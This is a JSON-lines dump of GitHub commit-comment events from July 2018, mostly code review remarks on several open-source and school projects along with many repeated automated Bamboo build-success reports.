{"id":"7932746725","type":"CommitCommentEvent","actor":{"login":"forax"},"repo":{"name":"forax/pro"},"payload":{"comment":{"id":29630490,"position":7,"line":39,"path":"plugins/tester/src/main/java/com.github.forax.pro.plugin.tester/com/github/forax/pro/plugin/tester/TesterRunner.java","commit_id":"c404529c767c719c07523eeb80fea0c53776660f","created_at":"2018-07-07T18:30:20Z","updated_at":"2018-07-07T18:30:20Z","author_association":"OWNER","body":"Not directly, apart from the fact that it means that a user has to import the right JUnit5 package, the configuration language should not use complex object like a DiscoverySelector.\r\nA pro script is like a mini language, a kind of DSL, if you starts to allow high level objects in it people will want to do complex things in their build script in order to be able to create such complex object (like creating other complex objects in order to create a DiscoverySelector).\r\n\r\nGradle and sbt both fell in that trap. Let's try to not follow them on that way.\r\n\r\nPro and all the builders takes only String, Path or URI as parameters, because like a LISP, you do not want your mini-language to have complex atoms."}},"created_at":"2018-07-07T18:30:20Z"}
{"id":"7932747253","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29630494,"position":null,"line":null,"path":null,"commit_id":"30c2c454c36a33ca351d9f717a29210b25671bd4","created_at":"2018-07-07T18:30:44Z","updated_at":"2018-07-07T18:30:44Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-07T18:30:44Z"}
{"id":"7932747460","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29630495,"position":null,"line":null,"path":null,"commit_id":"ddd2c913a3df0b153c89c681d4ed9eab38e134f9","created_at":"2018-07-07T18:30:52Z","updated_at":"2018-07-07T18:30:52Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-07T18:30:52Z"}
{"id":"7932747918","type":"CommitCommentEvent","actor":{"login":"enaut"},"repo":{"name":"Hideakiii/School-Tasks"},"payload":{"comment":{"id":29630496,"position":42,"line":73,"path":"Avalonion_v4/Avalonion_v6.py","commit_id":"72238f44c5a591fc2395a3dd066aa3f036a4f750","created_at":"2018-07-07T18:31:15Z","updated_at":"2018-07-07T18:31:15Z","author_association":"CONTRIBUTOR","body":"diese beiden ifs würde ich im `__init__` erledigen. Dann muss das nur einmal ausgeführt werden. So wie es jetzt ist wird ja mit jeder Aktualisierung/Bewegung einmal die Tastenliste abgefragt.\r\n\r\nAlso einfach ein paar Zeilen höher dem `self.keys = [ pygame.K_UP,...]` zuweisen. Weiter unten muss man dann natürlich auch wieder die self.keys verwenden, statt einfach nur keys."}},"created_at":"2018-07-07T18:31:15Z"}
{"id":"7932748105","type":"CommitCommentEvent","actor":{"login":"Loki77777"},"repo":{"name":"gregstein/AoE2Tools"},"payload":{"comment":{"id":29630498,"position":null,"line":null,"path":null,"commit_id":"3304be5e2a59630e1e79b3bb9a187806e80d9f90","created_at":"2018-07-07T18:31:24Z","updated_at":"2018-07-07T18:31:24Z","author_association":"NONE","body":"Would be cool if you could implement something like these:\r\nhttps://aokhotkeys.appspot.com/\r\nhttps://www.aoezone.net/threads/yet-another-recorded-game-analyzer.105797/\r\n\r\nA nice to handle hotkey editor and some rec analyzing tool\r\n\r\ncheers"}},"created_at":"2018-07-07T18:31:24Z"}
{"id":"7932748734","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29630501,"position":null,"line":null,"path":null,"commit_id":"8a6a92031d3bf7bc8d71b0fb7dbca764abc49fdb","created_at":"2018-07-07T18:31:56Z","updated_at":"2018-07-07T18:31:56Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-07T18:31:56Z"}
{"id":"7932748876","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29630502,"position":null,"line":null,"path":null,"commit_id":"effbf0cb0bd289925da79124c5b8e778a92736bc","created_at":"2018-07-07T18:32:04Z","updated_at":"2018-07-07T18:32:04Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-07T18:32:04Z"}
{"id":"7932749684","type":"CommitCommentEvent","actor":{"login":"FakelsHub"},"repo":{"name":"phobos2077/sfall"},"payload":{"comment":{"id":29630505,"position":19,"line":478,"path":"sfall/Modules/Scripting/Handlers/Interface.cpp","commit_id":"2a20209bb81a8824cd2d97209d89e5f2d9292093","created_at":"2018-07-07T18:32:48Z","updated_at":"2018-07-07T18:32:48Z","author_association":"CONTRIBUTOR","body":"add here `mode < 2 ||  ` \r\n`mode >= 2` - delete, is logical superfluous check"}},"created_at":"2018-07-07T18:32:48Z"}
{"id":"7932750039","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29630506,"position":null,"line":null,"path":null,"commit_id":"aa2b41023cab83e14ad9f61b13d09bde57e2cea4","created_at":"2018-07-07T18:33:10Z","updated_at":"2018-07-07T18:33:10Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-07T18:33:10Z"}
{"id":"7932750126","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29630507,"position":null,"line":null,"path":null,"commit_id":"effbf0cb0bd289925da79124c5b8e778a92736bc","created_at":"2018-07-07T18:33:14Z","updated_at":"2018-07-07T18:33:14Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-07T18:33:14Z"}
{"id":"7932751144","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29630508,"position":null,"line":null,"path":null,"commit_id":"b743c93a2505b2b6701159344167851ea1b8b857","created_at":"2018-07-07T18:34:07Z","updated_at":"2018-07-07T18:34:07Z","author_association":"OWNER","body":"# Specs execution successful\r\n:scroll: [View logs](http://bamboo.comnull)\r\n### Plans updated\r\n\r\nBamboo specs have been successfully imported and the following plans have been updated.\r\n\r\nProject | Plan | Build\r\n---|---|---\r\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\r\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\r\n\r\n### Deployments updated\r\n\r\nBamboo specs have been successfully imported and the following deployment projects have been updated.\r\n\r\n|Deployment project |\r\n----|\r\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\r\n"}},"created_at":"2018-07-07T18:34:07Z"}
{"id":"7932751450","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29630509,"position":null,"line":null,"path":null,"commit_id":"732090f331e4882a5ab94802e599362f94afd450","created_at":"2018-07-07T18:34:22Z","updated_at":"2018-07-07T18:34:22Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-07T18:34:22Z"}
{"id":"7932751510","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29630510,"position":null,"line":null,"path":null,"commit_id":"a28f341c2ef3441af8a6b63e4e08fdb4890fc544","created_at":"2018-07-07T18:34:25Z","updated_at":"2018-07-07T18:34:25Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-07T18:34:25Z"}
{"id":"7932752833","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29630512,"position":null,"line":null,"path":null,"commit_id":"9ff879811f4c95e4ebf9b965c64288f1d8c62639","created_at":"2018-07-07T18:35:32Z","updated_at":"2018-07-07T18:35:32Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-07T18:35:32Z"}
{"id":"7932752919","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29630513,"position":null,"line":null,"path":null,"commit_id":"ce6ccf1e29f0ce896512a5cf4056fe06f6345589","created_at":"2018-07-07T18:35:36Z","updated_at":"2018-07-07T18:35:36Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-07T18:35:36Z"}
{"id":"7932754212","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29630519,"position":null,"line":null,"path":null,"commit_id":"00b7483b5b50f7e4bb5018976b57fec6cbe53cd4","created_at":"2018-07-07T18:36:42Z","updated_at":"2018-07-07T18:36:42Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-07T18:36:42Z"}
{"id":"7932754311","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29630520,"position":null,"line":null,"path":null,"commit_id":"d846bee7b995a60038d1ab284be4b15525c7a5fa","created_at":"2018-07-07T18:36:48Z","updated_at":"2018-07-07T18:36:48Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-07T18:36:48Z"}
{"id":"7932754515","type":"CommitCommentEvent","actor":{"login":"enaut"},"repo":{"name":"Hideakiii/School-Tasks"},"payload":{"comment":{"id":29630521,"position":32,"line":63,"path":"Avalonion_v4/Avalonion_v6.py","commit_id":"72238f44c5a591fc2395a3dd066aa3f036a4f750","created_at":"2018-07-07T18:36:59Z","updated_at":"2018-07-07T18:36:59Z","author_association":"CONTRIBUTOR","body":"Vorsicht! Beim erstellen des playerobjekts wird eine playerid übergeben und gesetzt (Zeile 59). Hier wird diese überschrieben... das könnte später Verwirrung stiften. Also eigentlich braucht P_update keinen playerid-Parameter, weil man einfach self.playerid verwenden kann."}},"created_at":"2018-07-07T18:36:59Z"}
{"id":"7932755129","type":"CommitCommentEvent","actor":{"login":"ThaTiemsz"},"repo":{"name":"DJScias/Discord-Datamining"},"payload":{"comment":{"id":29630522,"position":null,"line":null,"path":null,"commit_id":"e6e01ac7a9ec53e7c399604213383a6a513b55a1","created_at":"2018-07-07T18:37:31Z","updated_at":"2018-07-07T18:37:31Z","author_association":"COLLABORATOR","body":"- Experiment `GUILD_VIDEO` renaned: `2018-07_guild-video` -> `2018-07_guild-video-v1`\r\n\r\n## New strings\r\n- `ADD_FRIEND_INPUT_HINT: \"DiscordTag#0000\"`\r\n- `ADD_FRIEND_NO_SUGGESTIONS: \"No suggestions found but you can still add them with their exact username and tag.\"`\r\n- `ADD_FRIEND_NO_CAPITALIZATION: \"Usernames are case sensitive and need a tag.\"`\r\n- `ADD_FRIEND_ADD_MANUALLY: \"Add Friend Manually\"`"}},"created_at":"2018-07-07T18:37:31Z"}
{"id":"7932755516","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29630523,"position":null,"line":null,"path":null,"commit_id":"aa2b41023cab83e14ad9f61b13d09bde57e2cea4","created_at":"2018-07-07T18:37:53Z","updated_at":"2018-07-07T18:37:53Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-07T18:37:53Z"}
{"id":"7932755699","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29630524,"position":null,"line":null,"path":null,"commit_id":"c6d06d8d0f59b201a6f7c792af17763a724a9816","created_at":"2018-07-07T18:38:03Z","updated_at":"2018-07-07T18:38:03Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-07T18:38:03Z"}
{"id":"7932756780","type":"CommitCommentEvent","actor":{"login":"mburger81"},"repo":{"name":"ionic-team/v4-migration-tslint"},"payload":{"comment":{"id":29630526,"position":null,"line":null,"path":null,"commit_id":"be4f9171d0f6814dd0a1e80ae77cfc7c4559749f","created_at":"2018-07-07T18:39:02Z","updated_at":"2018-07-07T18:39:02Z","author_association":"NONE","body":"Hello often we sei that the await of present is returned to function. I'm not sure why they do this sometimes and why sometimes not. But I think if it makes sense it could also covered by rule"}},"created_at":"2018-07-07T18:39:02Z"}
{"id":"7932756820","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29630527,"position":null,"line":null,"path":null,"commit_id":"9ff879811f4c95e4ebf9b965c64288f1d8c62639","created_at":"2018-07-07T18:39:04Z","updated_at":"2018-07-07T18:39:04Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-07T18:39:04Z"}
{"id":"7932756852","type":"CommitCommentEvent","actor":{"login":"sormuras"},"repo":{"name":"forax/pro"},"payload":{"comment":{"id":29630528,"position":7,"line":39,"path":"plugins/tester/src/main/java/com.github.forax.pro.plugin.tester/com/github/forax/pro/plugin/tester/TesterRunner.java","commit_id":"c404529c767c719c07523eeb80fea0c53776660f","created_at":"2018-07-07T18:39:07Z","updated_at":"2018-07-07T18:39:07Z","author_association":"COLLABORATOR","body":"Agreed.\r\n\r\nLooking at the method names and parameters of `DiscoverySelectors` they already do read like a minimal DSL. Perhaps we can expose them via the `TesterConf` interface.\r\n\r\n![image](https://user-images.githubusercontent.com/2319838/42413683-8bc1b76e-8225-11e8-992b-3d1f42ba8679.png)\r\n"}},"created_at":"2018-07-07T18:39:07Z"}
{"id":"7932757058","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29630529,"position":null,"line":null,"path":null,"commit_id":"b743c93a2505b2b6701159344167851ea1b8b857","created_at":"2018-07-07T18:39:17Z","updated_at":"2018-07-07T18:39:17Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-07T18:39:17Z"}
{"id":"7932757244","type":"CommitCommentEvent","actor":{"login":"NovaRain"},"repo":{"name":"phobos2077/sfall"},"payload":{"comment":{"id":29630530,"position":19,"line":478,"path":"sfall/Modules/Scripting/Handlers/Interface.cpp","commit_id":"2a20209bb81a8824cd2d97209d89e5f2d9292093","created_at":"2018-07-07T18:39:26Z","updated_at":"2018-07-07T18:39:26Z","author_association":"COLLABORATOR","body":"Doesn't doing so make inventory_redraw(0) (redrawing player inventory) only works in inventory/use screens?\r\nI've tested both inventory_redraw(0) and (1) in all four screens. The current code works fine."}},"created_at":"2018-07-07T18:39:26Z"}
{"id":"7932758103","type":"CommitCommentEvent","actor":{"login":"ThaTiemsz"},"repo":{"name":"DJScias/Discord-Datamining"},"payload":{"comment":{"id":29630531,"position":null,"line":null,"path":null,"commit_id":"f5872664d11dd622ab2500dd84d74b1181dda4b1","created_at":"2018-07-07T18:40:12Z","updated_at":"2018-07-07T18:40:12Z","author_association":"COLLABORATOR","body":"- `MAX_USER_AUTOCOMPLETE_RESULTS` -> `MAX_AUTOCOMPLETE_RESULTS`\r\n- `AUTOCOMPLETE_ROW_HEIGHT = 40`"}},"created_at":"2018-07-07T18:40:12Z"}
{"id":"7932758154","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29630532,"position":null,"line":null,"path":null,"commit_id":"9ff879811f4c95e4ebf9b965c64288f1d8c62639","created_at":"2018-07-07T18:40:15Z","updated_at":"2018-07-07T18:40:15Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-07T18:40:15Z"}
{"id":"7932758474","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29630535,"position":null,"line":null,"path":null,"commit_id":"609f0a68dd9493a8c90a4deeec0e8eca9dcb24a3","created_at":"2018-07-07T18:40:31Z","updated_at":"2018-07-07T18:40:31Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-07T18:40:31Z"}
